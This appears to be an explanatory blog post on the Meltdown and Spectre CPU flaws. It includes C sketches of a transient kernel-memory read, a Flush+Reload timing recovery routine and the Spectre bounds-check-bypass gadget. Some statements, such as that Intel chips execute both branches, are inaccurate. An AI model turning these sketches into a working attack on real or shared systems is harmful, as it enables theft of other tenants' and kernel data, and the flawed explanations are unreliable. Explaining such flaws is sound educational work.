Meltdown and Spectre
Meltdown and Spectre are two big vulnerabilities found in Intel and AMD chips out there. The vulnerability is so far-reaching that it affects chips going back to 1995.
On the Raspberry Pi blog, there is a very nice explanation of what Meltdown is.
First of all, the one who discovered this bug is a GENIUS, for sure.
The trick combines two observations.
Fact 1: speculation
Putting a lot of chips in parallel costs a lot, so the old Von Neumann model (one chip, one bus, one RAM and so on) was still the winning move in the 1990s. To push speed, we can add more ALUs (arithmetic logic units) to the chip. So we can try to execute some operations in parallel, even if they are presented serially, if and only if the final result is the same.
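As a toy illustration (hypothetical C, the function name is ours): the first two statements below are independent, so a superscalar core can send them to two ALUs in the same cycle, while the third must wait for both.

int sum_of_scaled(int x, int y)
{
    int a = x * 3;   /* independent of b: can issue to one ALU                     */
    int b = y * 5;   /* independent of a: can issue to a second ALU in parallel    */
    return a + b;    /* depends on both results, so it has to wait for them        */
}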
Reordering sequential instructions is a powerful way to recover more instruction-level parallelism, but as processors become wider (able to triple- or quadruple-issue instructions) it becomes harder to keep all those pipes busy. Modern processors have therefore grown the ability to speculate. Speculative execution lets us issue instructions which might turn out not to be required (because they may be branched over): this keeps a pipe busy (use it or lose it!), and if it turns out that the instruction isn't executed, we can just throw the result away.
The Intel chips execute both branches of an if and then throw away the result they do not need. But if you try to access an illegal location (like a kernel-protected area), the chip performs the access anyway and emits an exception only if that branch is actually executed (Fact 1).
But even if the illegal access is executed speculatively and the result is thrown away, the chip "caches" the memory location in its fast internal RAM caches.
It is called "implicit caching".
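A rough sketch, in C, of the kind of transient access Meltdown abuses; the names (probe_array, kernel_ptr, transient_read) are ours, and a real exploit needs far more scaffolding (a signal handler or TSX to survive the fault, cache flushing, and so on).

/* Rough sketch of a Meltdown-style transient access (our own naming).
 * Architecturally the illegal read faults before "value" is ever visible,
 * but on an affected CPU the dependent load below may still execute
 * speculatively and pull one page of probe_array into the cache,
 * encoding the secret byte as "which page is now cached". */
unsigned char probe_array[256 * 4096];        /* one page per possible byte value */

void transient_read(const unsigned char *kernel_ptr)
{
    unsigned char value = *kernel_ptr;        /* illegal read: raises a fault ...     */
    (void)probe_array[value * 4096];          /* ... but may run transiently first,
                                                 leaving a cache footprint of "value" */
}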
Fact 2: caching
Now, because of caching, you can trick the chip into reading one of two distant uncached memory areas based on a bit stored in a protected kernel area... and boom, you have just discovered a way to dump protected kernel memory from your own process.
Implicit caching occurs when a memory element is made potentially cacheable, although the element may never have been accessed in the normal von Neumann sequence. Implicit caching occurs on the P6 and more recent processor families due to aggressive prefetching, branch prediction, and TLB miss handling. Implicit caching is an extension of the behavior of existing Intel386, Intel486, and Pentium processor systems, since software running on these processor families also has not been able to deterministically predict the behavior of instruction prefetch.
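To read that cache footprint back, you time how quickly each page of the probe array reloads: the page touched by the transient load is already cached and comes back noticeably faster. Below is a minimal Flush+Reload-style sketch, assuming the probe_array from the sketch above and a GCC/Clang x86 target (for _mm_clflush and __rdtscp from <x86intrin.h>); in practice you would repeat the measurement many times to beat the noise.

#include <stdint.h>
#include <x86intrin.h>   /* _mm_clflush, __rdtscp (GCC/Clang, x86 only) */

extern unsigned char probe_array[256 * 4096];

/* Evict every probe page from the cache before triggering the transient access. */
void flush_probe_array(void)
{
    for (int i = 0; i < 256; i++)
        _mm_clflush(&probe_array[i * 4096]);
}

/* After the transient access, the page indexed by the secret byte reloads fastest. */
int recover_byte(void)
{
    unsigned int aux;
    uint64_t best_time = UINT64_MAX;
    int best_guess = -1;

    for (int guess = 0; guess < 256; guess++) {
        volatile unsigned char *p = &probe_array[guess * 4096];
        uint64_t start   = __rdtscp(&aux);          /* serialising timestamp */
        (void)*p;                                   /* timed reload          */
        uint64_t elapsed = __rdtscp(&aux) - start;
        if (elapsed < best_time) {                  /* cached page => fastest reload */
            best_time  = elapsed;
            best_guess = guess;
        }
    }
    return best_guess;
}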
Because a lot of servers run in cloud environments, this exposes cloud providers to the risk that one customer can read another customer's sensitive data, as far as we can understand.
The fix was rolled out after six months of hard work, and today the "solution" is a slow software workaround at the operating-system level.
Is this a bug?
Difficult to say. For sure, speculation and instruction reordering are very complex techniques, and some humble ARM chips do not have them. But some advanced ARM, AMD and Intel chips do: it is a "common" technology nowadays, like fast carry in addition algorithms. The Raspberry Pi is totally untouched by this vulnerability; this is the only good news. But a lot of chips can be attacked in this way.
Spectre uses a more subtle attack, "training" speculative execution (emphasis ours):
For example when the program’s control flow depends on an uncached value located in the physical memory, it may take several hundred clock cycles before the value becomes known. Rather than wasting these cycles by idling, the processor guesses the direction of control flow, saves a checkpoint of its register state, and proceeds to speculatively execute the program on the guessed path. When the value eventually arrives from memory the processor checks the correctness of its initial guess. If the guess was wrong, the processor discards the (incorrect) speculative execution by reverting the register state back to the stored checkpoint, resulting in performance comparable to idling. In case the guess was correct, however, the speculative execution results are committed, yielding a significant performance gain as useful work was accomplished during the delay.
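The classic variant-1 gadget from the Spectre paper looks roughly like this (array1, array2 and array1_size follow the paper's example; the surrounding sketch and comments are ours): after the branch has been "trained" with many in-bounds values of x, an out-of-bounds x may be speculatively accepted, and the two dependent loads encode a byte from outside array1 into the cache, ready to be recovered with the same timing trick as above.

#include <stddef.h>

unsigned int  array1_size = 16;
unsigned char array1[16];
unsigned char array2[256 * 4096];

/* Spectre variant-1 (bounds check bypass) gadget, as in the paper's example.
 * After training the branch predictor with in-bounds x, a malicious
 * out-of-bounds x can be speculatively accepted: the out-of-bounds read and
 * the dependent load into array2 then run transiently and leave a cache
 * footprint that encodes one byte of memory outside array1. */
void victim_function(size_t x)
{
    if (x < array1_size) {                    /* predicted taken after training    */
        unsigned char secret = array1[x];     /* transient out-of-bounds read      */
        (void)array2[secret * 4096];          /* encodes "secret" as a cached page */
    }
}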
Extra Resources
About Latency
https://github.com/colin-scott/interactive_latencies